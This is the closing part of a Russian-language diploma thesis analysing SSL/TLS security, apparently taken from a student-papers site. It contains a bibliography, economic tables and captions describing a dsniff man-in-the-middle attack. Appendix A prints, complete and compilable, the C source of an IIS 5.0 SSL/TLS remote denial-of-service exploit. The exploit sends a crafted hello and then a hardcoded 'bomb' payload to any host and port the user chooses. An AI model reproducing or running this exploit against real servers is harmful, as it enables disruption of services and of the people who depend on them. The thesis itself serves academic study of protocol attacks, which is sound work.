19. ГОСТ 12.4.113-82. ССЮТ. Учебные лабораторные работы. Общие требования безопасности.

20. ГОСТ 23611 - 79. Совместимость РЭС электромагнитная. Термины и определения.

21. ГОСТ 23872 - 79. Совместимость РЭС электромагнитная. Номенклатура параметров и классификация технических характеристик.

22. ДНАОП 0.00-1.31-99. Правила охорони праці при експлуатації електронно - обчислювальних машин.

23. ДНАОП 0.04-4.12-94. Типові положения про навчання, інструктаж та перевірку знань з питань охорони праці.

24. ДСП 3.3.6.037-99. Норми виробничого шуму та ультразвуку.

25. Методические указания по технико-экономическому обоснованию дипломных проектов для студентов специальностей 8.091501 (КСМ, СП, СКС). Составители: проф. Денисова И.Г., доц. Скибицкая В.И. Харьков: ХНУРЭ, 2004

26. Охорона праці користувачів комп'ютерних відеодисплейних терміналів.

Київ, 1997.-400с.

27. Петровский В.И., Седельников Ю.Е. Электромагнитная совместимость радиоэлектронных средств: Учеб. пособие для вузов. - М.: Радио и связь, 1986. - 216 с.: ил.

28. Правила устройства электроустановок. ПУЭ-85.

39. СП 3223-85. Санитарные нормы допустимых уровней шума на рабочих местах.

30. СНиП П-4-79. Нормы проектирования. Естественное и искусственное освещение.

31. СНиП 2.01.02-85. Противопожарные нормы проектирования предприятий и сооружений.

32. Электромагнитная совместимость радиоэлектронных средств и непреднамеренные помехи: Пер. с англ. В 3-х т. - М.: Сов. радио, 1977 - 1979.

33. Электромагнитная совместимость радиоэлектронных средств и систем / В.И. Владимиров, Ф.В. Елизаров и др.: Под ред. Н.М. Царькова. - М.:Радио и связь, 1985. - 272 с., ил.

34. В.Ц. Жидецький, Джигерей. Практикум із охорони праці: Учеб. пособие для вузов.

35. ДСТУ 3008-95. Документация. Отчеты в сфере науки и техники. Структура и правила оформления. Государственный стандарт Украины.

ПРИЛОЖЕНИЯ

сеть протокол клиент сервер

Приложение А

Текст программы

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <netdb.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <ctype.h>

#include <string.h>

#include <arpa/nameser.h>

#include <errno.h>

int exist_host( char *, u_long *);

void init_hello(void);

/* begin cipher suites: */

char cipher_suites[] = /* 52 */

{0x00,0x39,0x00,0x38,0x00,0x35,0x00,0x16,0x00,0x13,0x00,0x0A,0x00,0x33,0x00

,0x32,0x00,0x2F,0x00,0x66,0x00,0x05,0x00,0x04,0x00,0x63,0x00,0x62,0x00,0x61

,0x00,0x15,0x00,0x12,0x00,0x09,0x00,0x65,0x00,0x64,0x00,0x60,0x00,0x14,0x00

,0x11,0x00,0x08,0x00,0x06,0x00,0x03};

/* begin binary data: */

char bin_data[] = /* 1308 */

{0x16,0x03,0x00,0x03,0xB8,0x01,0x00,0x03,0xB4,0x00,0x03,0xB1,0x00,0x03,0xAE

,0x30,0x82,0x03,0xAA,0x30,0x82,0x03,0x13,0xA0,0x03,0x02,0x01,0x02,0x02,0x01

,0x00,0x30,0x0D,0x06,0x09,0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x04,0x05

,0x00,0x30,0x81,0x9B,0x31,0x0B,0x30,0x09,0x06,0x03,0x55,0x04,0x06,0x13,0x02

,0x45,0x53,0x31,0x11,0x30,0x0F,0x06,0x03,0x55,0x04,0x08,0x13,0x08,0x50,0x61

,0x6C,0x65,0x6E,0x63,0x69,0x61,0x31,0x14,0x30,0x12,0x06,0x03,0x55,0x04,0x07

,0x13,0x0B,0x54,0x6F,0x72,0x72,0x65,0x62,0x6C,0x61,0x63,0x6F,0x73,0x31,0x0F

,0x30,0x0D,0x06,0x03,0x55,0x04,0x0A,0x13,0x06,0x53,0x32,0x31,0x73,0x65,0x63

,0x31,0x19,0x30,0x17,0x06,0x03,0x55,0x04,0x0B,0x13,0x10,0x77,0x77,0x77,0x2E

,0x77,0x61,0x73,0x61,0x68,0x65,0x72,0x6F,0x2E,0x6F,0x72,0x67,0x31,0x0F,0x30

,0x0D,0x06,0x03,0x55,0x04,0x03,0x13,0x06,0x53,0x32,0x31,0x73,0x65,0x63,0x31

,0x26,0x30,0x24,0x06,0x09,0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x01,0x16

,0x17,0x64,0x65,0x76,0x65,0x6C,0x6F,0x70,0x65,0x72,0x73,0x40,0x77,0x61,0x73

,0x61,0x68,0x65,0x72,0x6F,0x2E,0x6F,0x72,0x67,0x30,0x1E,0x17,0x0D,0x30,0x34

,0x30,0x34,0x31,0x33,0x30,0x38,0x33,0x30,0x35,0x39,0x5A,0x17,0x0D,0x30,0x35

,0x30,0x34,0x31,0x33,0x30,0x38,0x33,0x30,0x35,0x39,0x5A,0x30,0x81,0x9B,0x31

,0x0B,0x30,0x09,0x06,0x03,0x55,0x04,0x06,0x13,0x02,0x45,0x53,0x31,0x11,0x30

,0x0F,0x06,0x03,0x55,0x04,0x08,0x13,0x08,0x50,0x61,0x6C,0x65,0x6E,0x63,0x69

,0x61,0x31,0x14,0x30,0x12,0x06,0x03,0x55,0x04,0x07,0x13,0x0B,0x54,0x6F,0x72

,0x72,0x65,0x62,0x6C,0x61,0x63,0x6F,0x73,0x31,0x0F,0x30,0x0D,0x06,0x03,0x55

,0x04,0x0A,0x13,0x06,0x53,0x32,0x31,0x73,0x65,0x63,0x31,0x19,0x30,0x17,0x06

,0x03,0x55,0x04,0x0B,0x13,0x10,0x77,0x77,0x77,0x2E,0x77,0x61,0x73,0x61,0x68

,0x65,0x72,0x6F,0x2E,0x6F,0x72,0x67,0x31,0x0F,0x30,0x0D,0x06,0x03,0x55,0x04

,0x03,0x13,0x06,0x53,0x32,0x31,0x73,0x65,0x63,0x31,0x26,0x30,0x24,0x06,0x09

,0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x01,0x16,0x17,0x64,0x65,0x76,0x65

,0x6C,0x6F,0x70,0x65,0x72,0x73,0x40,0x77,0x61,0x73,0x61,0x68,0x65,0x72,0x6F

,0x2E,0x6F,0x72,0x67,0x30,0x81,0x9F,0x30,0x0D,0x06,0x09,0x2A,0x86,0x48,0x86

,0xF7,0x0D,0x01,0x01,0x01,0x05,0x00,0x03,0x81,0x8D,0x00,0x30,0x81,0x89,0x02

,0x81,0x81,0x00,0xC4,0x76,0x8B,0x8E,0x3A,0x00,0x70,0xD7,0xA0,0x36,0xCF,0xFC

,0xE8,0xBF,0x2E,0x18,0x83,0xB0,0xC5,0x7C,0x64,0x2F,0xF7,0xA8,0x31,0x70,0xF4

,0xBF,0x31,0x1D,0x81,0x57,0xD7,0x37,0xF9,0xDD,0x7C,0x4E,0xDF,0xB9,0xE2,0xAF

,0x69,0x79,0xB3,0xD5,0x59,0x91,0xED,0x27,0xF0,0x44,0x0A,0xC4,0x3C,0x43,0xF9

,0xE8,0x03,0xAE,0x10,0xDD,0x8B,0x52,0xC0,0x33,0xD7,0x9D,0x6D,0xE3,0xFF,0x03

,0x4B,0x89,0x2F,0x1A,0x73,0xCD,0x11,0x8A,0xD1,0xC1,0x40,0x21,0x2F,0x57,0x22

,0x23,0xF5,0x30,0xF8,0x8A,0x0B,0x02,0xDC,0x31,0xB5,0x4C,0xD9,0xCC,0x5A,0x83

,0xD8,0x7F,0x0A,0xC1,0x5F,0xA6,0x43,0x6C,0xD4,0xEC,0x9F,0x2F,0xEC,0x9A,0x01

,0x63,0x6D,0x30,0x11,0xB9,0xDA,0x73,0x53,0xC2,0x92,0x6B,0x02,0x03,0x01,0x00

,0x01,0xA3,0x81,0xFB,0x30,0x81,0xF8,0x30,0x1D,0x06,0x03,0x55,0x1D,0x0E,0x04

,0x16,0x04,0x14,0xE9,0x66,0x7B,0x58,0x23,0xA2,0x35,0x0F,0xD4,0x31,0x7C,0xAE

,0xC6,0x87,0x64,0x38,0x4E,0xAB,0xAA,0x58,0x30,0x81,0xC8,0x06,0x03,0x55,0x1D

,0x23,0x04,0x81,0xC0,0x30,0x81,0xBD,0x80,0x14,0xE9,0x66,0x7B,0x58,0x23,0xA2

,0x35,0x0F,0xD4,0x31,0x7C,0xAE,0xC6,0x87,0x64,0x38,0x4E,0xAB,0xAA,0x58,0xA1

,0x81,0xA1,0xA4,0x81,0x9E,0x30,0x81,0x9B,0x31,0x0B,0x30,0x09,0x06,0x03,0x55

,0x04,0x06,0x13,0x02,0x45,0x53,0x31,0x11,0x30,0x0F,0x06,0x03,0x55,0x04,0x08

,0x13,0x08,0x50,0x61,0x6C,0x65,0x6E,0x63,0x69,0x61,0x31,0x14,0x30,0x12,0x06

,0x03,0x55,0x04,0x07,0x13,0x0B,0x54,0x6F,0x72,0x72,0x65,0x62,0x6C,0x61,0x63

,0x6F,0x73,0x31,0x0F,0x30,0x0D,0x06,0x03,0x55,0x04,0x0A,0x13,0x06,0x53,0x32

,0x31,0x73,0x65,0x63,0x31,0x19,0x30,0x17,0x06,0x03,0x55,0x04,0x0B,0x13,0x10

,0x77,0x77,0x77,0x2E,0x77,0x61,0x73,0x61,0x68,0x65,0x72,0x6F,0x2E,0x6F,0x72

,0x67,0x31,0x0F,0x30,0x0D,0x06,0x03,0x55,0x04,0x03,0x13,0x06,0x53,0x32,0x31

,0x73,0x65,0x63,0x31,0x26,0x30,0x24,0x06,0x09,0x2A,0x86,0x48,0x86,0xF7,0x0D

,0x01,0x09,0x01,0x16,0x17,0x64,0x65,0x76,0x65,0x6C,0x6F,0x70,0x65,0x72,0x73

,0x40,0x77,0x61,0x73,0x61,0x68,0x65,0x72,0x6F,0x2E,0x6F,0x72,0x67,0x82,0x01

,0x00,0x30,0x0C,0x06,0x03,0x55,0x1D,0x13,0x04,0x05,0x30,0x03,0x01,0x01,0xFF

,0x30,0x0D,0x06,0x09,0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x04,0x05,0x00

,0x03,0x81,0x81,0x00,0x75,0x2D,0x19,0xE1,0xAD,0x19,0x77,0x75,0xCB,0xCB,0x76

,0x88,0x38,0xF8,0xD5,0x27,0xD2,0xAB,0x79,0x7F,0x39,0x4A,0x9C,0x56,0x9A,0x5F

,0xCA,0x0C,0xAC,0x21,0x16,0xF6,0xF5,0xE2,0xE8,0xE1,0xB9,0xC2,0x29,0x25,0x52

,0xAF,0xF1,0x83,0x28,0xB0,0x00,0x7B,0xA6,0x12,0xE6,0xC7,0x4D,0x93,0x0C,0x7E

,0xD0,0x83,0x1E,0x59,0x4D,0xEB,0xDF,0xDC,0xED,0x05,0x01,0x84,0xC7,0x92,0x52

,0x65,0x26,0xAA,0x08,0x45,0x65,0x5A,0xB6,0x33,0xDC,0x2A,0xBB,0x85,0x26,0x14

,0x9C,0xBD,0xED,0xFB,0xBB,0x53,0xB3,0xA4,0xB3,0x27,0xC7,0x25,0x02,0xD4,0x0D

,0xAA,0x5E,0x2F,0x53,0xD4,0x1F,0xFB,0xFE,0x07,0x24,0xC6,0x27,0x65,0x59,0x35

,0x43,0x7D,0x28,0xD7,0x42,0x11,0x57,0x84,0x17,0x0D,0x99,0x2B,0x16,0x03,0x00

,0x00,0x84,0x10,0x00,0x00,0x80,0x2A,0x68,0x9A,0xBC,0x58,0x4D,0xA8,0xDD,0xD3

,0x95,0xC0,0xF2,0x70,0x98,0xC8,0xBE,0xE5,0x0C,0x0D,0xC1,0x40,0xD5,0x95,0x17

,0xD6,0xBF,0x04,0x2B,0xEB,0x18,0x54,0x2D,0x9F,0x72,0x55,0xCA,0x84,0x26,0xF2

,0xAF,0xFA,0x13,0xE2,0x15,0x9A,0x88,0x31,0x92,0xC5,0x1E,0xB7,0xF8,0xD7,0x2D

,0x97,0x9A,0x46,0xEF,0x73,0xFF,0xB3,0xA1,0x92,0x0B,0x64,0xC5,0xC8,0xA9,0xBB

,0x24,0xE5,0xD2,0x4B,0x49,0x0D,0x1B,0xB1,0x5F,0xE4,0x5E,0x2E,0x60,0x29,0x48

,0xB5,0xC2,0x1C,0xA5,0x53,0x7B,0x7B,0x55,0xFD,0x1A,0xAF,0x89,0x0B,0x0B,0xB4

,0x91,0x0E,0xE5,0x32,0x90,0xCD,0xB4,0xC5,0xD6,0x30,0x01,0xCD,0x83,0x29,0xDA

,0x4D,0xA5,0x51,0x0B,0x95,0xDC,0xF0,0x83,0x3C,0x81,0x18,0x3D,0x90,0x83,0x16

,0x03,0x00,0x00,0x86,0x0F,0x00,0x00,0x82,0x00,0x80,0xC0,0x56,0x18,0x55,0x92

,0xEF,0x42,0xC2,0x96,0xB5,0x9D,0x81,0x9D,0x3E,0x2A,0x9C,0x60,0x9B,0x9F,0x65

,0xF7,0xFF,0xD0,0xE8,0x2E,0xB9,0x58,0x3A,0xDC,0x68,0xA3,0xBD,0x05,0x5B,0x28

,0x66,0xF5,0x23,0x87,0xE7,0x0C,0xCE,0xD1,0x07,0x4D,0x8D,0xB8,0x40,0x86,0x12

,0xFF,0x60,0x73,0x0F,0xA6,0x91,0x71,0xAC,0x23,0xCC,0x5A,0xB1,0x5C,0xAD,0x62

,0xD5,0xE9,0x73,0xC7,0xCC,0x13,0x95,0x08,0xCE,0xD9,0x75,0xB4,0xB1,0xE5,0x46

,0x0C,0x85,0xE1,0x50,0x1A,0xBC,0x53,0x4B,0xD1,0x5B,0x1A,0xD7,0x7A,0xD7,0x47

,0xC5,0xFC,0x5B,0xA8,0x19,0xB8,0x6D,0xF6,0xD6,0x7B,0x97,0x38,0xD4,0x71,0x3E

,0x60,0xA3,0xCB,0x02,0x4C,0xB5,0x26,0xEE,0xB4,0xF9,0x31,0x3F,0xB7,0xAE,0x65

,0xBC,0x4C,0x6F,0x14,0x03,0x00,0x00,0x01,0x01,0x16,0x03,0x00,0x00,0x40,0x72

,0x12,0x84,0x91,0x08,0x56,0xDC,0x9A,0x1F,0x49,0x35,0x9F,0xC7,0x70,0x16,0x14

,0xAE,0xED,0x32,0x89,0x46,0x10,0x18,0x73,0xB5,0x40,0xB7,0xBA,0xCC,0xB0,0x75

,0xCF,0x96,0x3E,0xDC,0x0F,0x97,0xEE,0xDC,0x3A,0x0F,0xB7,0xD2,0xCD,0x8B,0x0C

,0x99,0xDB,0xA6,0x1E,0xD0,0xF9,0x32,0xCD,0x3B,0xE6,0x32,0xBD,0xC4,0xA9,0x62

,0x2F,0xD5,0xC6};

struct ssl_hello {

char handshake;

short version;

short length;

char client_hello;

char client_length[3];

short client_version;

int timestamp;

char random_bytes[28];

char session_id_length;

char session_id[32];

short cipher_length;

char cipher_suite[52];

char compression_length;

char compression_method;

} __attribute__((packed)) ssl_hello;

int tls;

int

main(int argc, char *argv[])

{

struct sockaddr_in addr;

int sock,i;

char buffer[32];

setvbuf(stdout, NULL, _IONBF, 0);

printf("\n<*> S21sec Microsoft IIS 5.0 SSL/TLS Remote DoS <*>\n\n");

tls=0;

if ((argc != 4) && (argc != 3))

{

printf(" Usage: %s [host] [port] {t}\n", argv[0]);

printf(" host - Host (name/IP) to connect to.\n");

printf(" port - TCP port to connect to.\n");

printf(" t - Enable TLS (disabled by default).\n\n");

exit(1);

}

if (argc == 4)

{

if ( strcmp(argv[3], "t"))

{

printf(" -> Ouch!! What is '%s'?\n\n",argv[3]);

exit(1);

}

else

{

tls=1;

bin_data[2]=0x01;

}

}

memset(&addr, 0, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(atoi(argv[2]));

if ( exist_host( argv[1], (u_long *)&(addr.sin_addr.s_addr) ) )

{

printf(" -> Ouch!! Wrong or nonexistant host '%s'!!\n\n",argv[1]);

exit(1);

}

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)

{

printf(" -> Error on socket(): %s\n", strerror(errno));

exit(1);

}

printf(" -> Connecting to %s:%s...",argv[1],argv[2]);

if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)

{

printf("\n -> Error on connect(): %s\n", strerror(errno));

exit(1);

}

init_hello();

printf(" OK\n -> Sending %s Client Hello...",((tls)?"TLS":"SSL"));

if (write(sock, (void *)&ssl_hello, sizeof(struct ssl_hello)) == -1)

{

printf("\n -> Error on write(): %s\n", strerror(errno));

exit(1);

}

printf(" OK\n -> Waiting for %s Server Hello...",((tls)?"TLS":"SSL"));

if (read(sock, (void *)buffer, sizeof(buffer)) == -1)

{

printf("\n -> Error on read(): %s\n", strerror(errno));

exit(1);

}

printf(" OK\n -> Sending bomb...");

if (write(sock, (void *)bin_data, sizeof(bin_data)) == -1)

{

printf("\n -> Error on write(): %s\n", strerror(errno));

exit(1);

}

for (i=0; i<6 ; i++)

{

printf(" B00M!!");

usleep(350000);

}

close(sock);

printf("\n ->\n -> OK. If DoS has been worked you will not be able to negotiate %s with %s:%s\n\n",

((tls)?"TLS":"SSL"),argv[1],argv[2]);

exit(0);

}

int

exist_host( char *nom_host, u_long *bin_host )

{

struct hostent *hinfo;

struct sockaddr_in host_tmp;

struct in_addr host_binario;

memset( (char *)&host_tmp, 0, sizeof(host_tmp) );

memset( (char *)&host_binario, 0, sizeof(host_binario) );

host_tmp.sin_family = AF_INET;

if ( inet_aton( nom_host, &host_binario) )

{

memcpy( (char *)bin_host, (char *)&host_binario, sizeof(host_binario));

return 0;

}

if ( (hinfo = gethostbyname( nom_host )) ) /* Put nom_host into bin_host */

{

memcpy((char *)&host_tmp.sin_addr, hinfo->h_addr, hinfo->h_length);

memcpy((char *)bin_host, (char *) &host_tmp.sin_addr.s_addr,

sizeof( host_tmp.sin_addr.s_addr));

return 0;

}

return 1;

}

void

init_hello(void)

{

ssl_hello.handshake = 0x16;

if (!tls)

ssl_hello.version = htons(0x0300);

else

ssl_hello.version = htons(0x0301);

ssl_hello.length = htons(0x007f);

ssl_hello.client_hello = 0x01;

memcpy((void *)ssl_hello.client_length, (void *)"\x00\x00\x7b", 3);

if (!tls)

ssl_hello.client_version = htons(0x0300);

else

ssl_hello.client_version = htons(0x0301);

ssl_hello.timestamp = htonl(0x407babc0);

memset((void *) ssl_hello.random_bytes, 0x66, 28);

ssl_hello.session_id_length = 0x20;

memset((void *) ssl_hello.session_id, 0x66, 32);

ssl_hello.cipher_length = htons(0x0034);

memcpy((void *)ssl_hello.cipher_suite, (void *)cipher_suites, sizeof(cipher_suites));

ssl_hello.compression_length = 0x01;

ssl_hello.compression_method = 0x00;

}

Приложение Б

Программная реализация Dos-атаки

Рисунок Б.1 - Рабочее окно програмного продукта

Приложение В

Атака «посередника» на SSL при применении утилиты dsniff

Рисунок В.1 - Генерация сертификата, запуск MITM демона

Рисунок В.2 - Подмена DNS

Рисунок В.3 - Добавление сертификата пользователем

Рисунок В.4 - Нападающий получает полный доступ к данным HTTPS

Приложение Г

Таблицы выходных данных для ТЕО

Таблица Г.1- Примененные основные фонды и их стоимость

Наименнование ОФ

Стоимость ОФ (грн.)

Первоначальная

Остат. на данний год

ПЭВМ (Сeleron 1,6)

1400

Итого:

1400

Таблица Г.2 - Стоимость услуг сторонних организаций

Наименование услуги

Стоимость услуги (грн.)

Интернет-провайдер (Utel)

200

Заправка картриджа

80

Итого:

280

Таблиця Г.3 - Стоимость командировочных затрат

Город

Стоимость командировки (грн.)

Стоимость командировок

общая сумма (грн.)

Киев

230

1

230

Итого:

230

Таблица Г.4 - Другие затраты

Наименование затрат

Стоимость (грн.)

Количество

Общая сума (грн.)

Консультація БЖД

37

3

111

Итого:

111

Организация условий выполнения работы.

Разработка проводится в условиях научно-проектной организации, которая является юридическим лицом _____ формы собственности. ОФ, которые имеются на момент выполнения данного проекта, являются его собственностью. Следовательно, учитываются только амортизационные отчисления от их остаточной стоимости.

Считается, что в данной работе на этапе разработки проекту могут быть заняты следующие категории специалистов:

- аналитик компьютерных систем в лице студента;

- руководитель проекту;

- консультант по экономической части.

Таблица Г.6 - Выходные данные для ТЭО

Наименование

Обозначения

Единицы измерения

Значение

1

Затраты на маркетинг

М

Грн.

1000

2

Стоимость ОФ(разработка)

ОФр

Грн.

800

3

Стоимость ОФ(тиражирование)

ОФт

Грн.

600

4

Затраты на реализацию

Sb

Грн.

900

5

Стоимость сторонних организаций

СУ

Грн.

280

6

Затраты на командировки

КОМ

Грн.

230

7

Приобретение ИТ

НОУ

Грн.

2535

8

Амортизационные отчисления

Amt

%

17

9

Другие затраты

ДЗ

Грн.

111

10

Необлагаемый налогом мин.зарпл.

НМ

Грн.

17

11

Средне рассчитываемая ставка процента по заёмным средствам

СРСП

%

18

12

Ставка налогообложения прибыли

СтНП

%

25

13

Ставка налогообложения выручки

СтНВ

%

-

14

Налог на доб. стоимость

ПДВ

%

20

15

Объем тиража

R

Шт.

3

16

Сумма платежей и налогов

сonst

Грн.

540

17

Плече

ЗС/СС

1/1

Требуется выполнить:

- Расчет затрат на маркетинг;

- Расчет затрат на сбыт;

- Расчет затрат на разработку;

- Расчет затрат на тиражирование;

- Расчет полных затрат;

- Планирование структуры пассива;

- Расчет цены и финансовых результатов;

- Расчет конкурентоспособности;

Консультант по экономической части проф.Денисова И.Г.

Приложение Д

Протокол выходных данных

Тема: «Анализ защищенности протокола SSL/TLS при применении различных криптопримитивов»

Наименование аналога: Программная реализация атаки на протокол SSL , разработана в 2004 году, Украина.

Таблица К.1 - Целевая направленность разработки

Вопросы, на которые необходимо ответить

Тип представления ответов

1

1.1 Ознакомление с принципом работы аналога.

1.2 Анализ защищенности аналога.

1.3 Недостатки в известном аналоге.

- Описание возможностей применения;

- Описание алгоритмов, программных средств реализации протокола, примененных раньше языков и средств программирования атак на протокол SSL;

- Описание примененного алгоритма, положеного в основу работы протоколу SSL.

2

Особенности разработки дипломной работы

- Необходимое программное обеспечение, которое позволяет проводить исследования;

- Сравнить атаки на аналог.

3

Масштаб работы

- Системотехническое описание всей программы с исследованием характеристик работы ее блоков;

- Исследование параметров работы протокола SSL;

- Исследование условий применения алгоритма атаки;

- Методы борьбы с существующими атаками.

Таблица Д.2 - Применение других ресурсов и средств ИТ

Этапы, на которых использован ресурс

Оформление лиц - ых патентов

Применение лиц - ых программ, ПС

Приобретение

специальных ІТ, ПС

Приобретение лицензионной информации

Кол-во, ед. изм.

Цена,

грн.

Кол-во, ед. изм.

Цена,

грн.

Кол-во, ед. изм.

Цена,

грн.

Кол-во, ед. изм.

Цена,

грн..

Маркетинг

Разработка

2 пак.

1200

1 вид.

35

Тиражирование ед. тиражу

2 пак.

1300

Сбыт

Оформление ед. тиражу

Технические параметры, характеристики объекта разработки:

Таблица Д.3 - Перечень технических параметров

Наименование параметра

Ед.

изм.

Числовые значения

разработки

аналога

Безопасное время опер. системи

мин.

3

15

Тип атаки

name

Dos

DES

Кол-во опер в сек..

оп/сек

Вероятность успеха

%

100

80

Особенности тиражирования:

Таблица Д.4 - Тиражируемый результат, способ его получения

1

Кол-во копий

3

2

Конечный результат

- техническая документация;

- программная реализация атаки.

3

Способ получения тиражу

- изготовление CD-дисков с demo-версией.

4

Цели

- выполнение лаб. работ студентами;

- публикация НТИ;

Размещено на Allbest


Подобные документы

  • Описание и предназначение протокола DNS. Использование файла host. Особенности и описание способов атак на DNS: ложный DNS-сервер, простой DNS-флуд, фишинг, атака посредством отраженных DNS-запросов. Защита и противодействие атакам на протокол DNS.

    реферат [324,3 K], добавлен 15.12.2014

  • Алгоритмы работы протокола STP. Статусы портов в протоколе SpanningTree. Виды, описание протоколов, агрегация каналов. Схемы возможных атак, способы обнаружения. Слияние-расхождение деревьев, локализованный отказ в обслуживании, спровоцированный сниффинг.

    курсовая работа [86,8 K], добавлен 07.04.2015

  • Протокол как основа сетевых технологий. Сети TCP/IP - ключевые адреса и имена. Средства IP-безопасности для защиты от многочисленных атак. Особенности организации информационных ресурсов Интернета. Хакинг и антихакинг: защита и нападение на практике.

    презентация [2,2 M], добавлен 18.12.2013

  • Анализ основных атак на протокол TLS и определение методов противодействия этим атакам. Разработка метода перехвата и расшифровки трафика, передаваемого по протоколу HTTPS. Расшифровка передаваемых данных в режиме, приближенному к реальному времени.

    статья [1013,4 K], добавлен 21.09.2017

  • Изучение деятельности фирмы СООО "Гейм Стрим", занимающейся разработкой программного обеспечения интеллектуальных систем. Проведение работы по тестированию информационных систем на степень защищенности и безопасности от разного рода информационных атак.

    отчет по практике [933,1 K], добавлен 05.12.2012

  • Основные функции отдела камеральных проверок налоговой инспекции. Автоматизация процесса назначения IP-адресов узлам сети с использованием протокола DHCP. Проблемы и примеры работы протокола DHCP. Модель клиент-сервер, механизм функционирования.

    отчет по практике [91,2 K], добавлен 22.03.2012

  • Компьютерные атаки и технологии их обнаружения. Сетевые системы нахождения атак и межсетевые экраны. Программные средства анализа защищенности и отражения угроз. Внедрение программных средств выявления атак для информационной системы предприятия.

    курсовая работа [53,6 K], добавлен 16.03.2015

  • Организация связи между электронными устройствами. Коммуникационный протокол, основанный на архитектуре "клиент-сервер". Чтение флагов, дискретных входов, регистров хранения и регистров ввода. Запись регистра хранения. Обработка прерываний и запроса.

    курсовая работа [1,4 M], добавлен 07.07.2011

  • Анализ и сравнение различных методов реализации системы защиты сетевых соединений. Виды сетевых атак и методика их негативного воздействия, возможные последствия и меры их профилактики. Структура протокола создания защищенных сетевых соединений ISAKMP.

    дипломная работа [284,1 K], добавлен 19.06.2010

  • Компьютерная сеть предприятия, ее схема и конфигурация, возможные угрозы сети и степень ее защищенности. Анализ методов и средств обеспечения безопасности сети. Организация защиты информации криптографическими методами, разработка программного модуля.

    курсовая работа [780,7 K], добавлен 06.06.2011

Работы в архивах красиво оформлены согласно требованиям ВУЗов и содержат рисунки, диаграммы, формулы и т.д.
PPT, PPTX и PDF-файлы представлены только в архивах.
Рекомендуем скачать работу.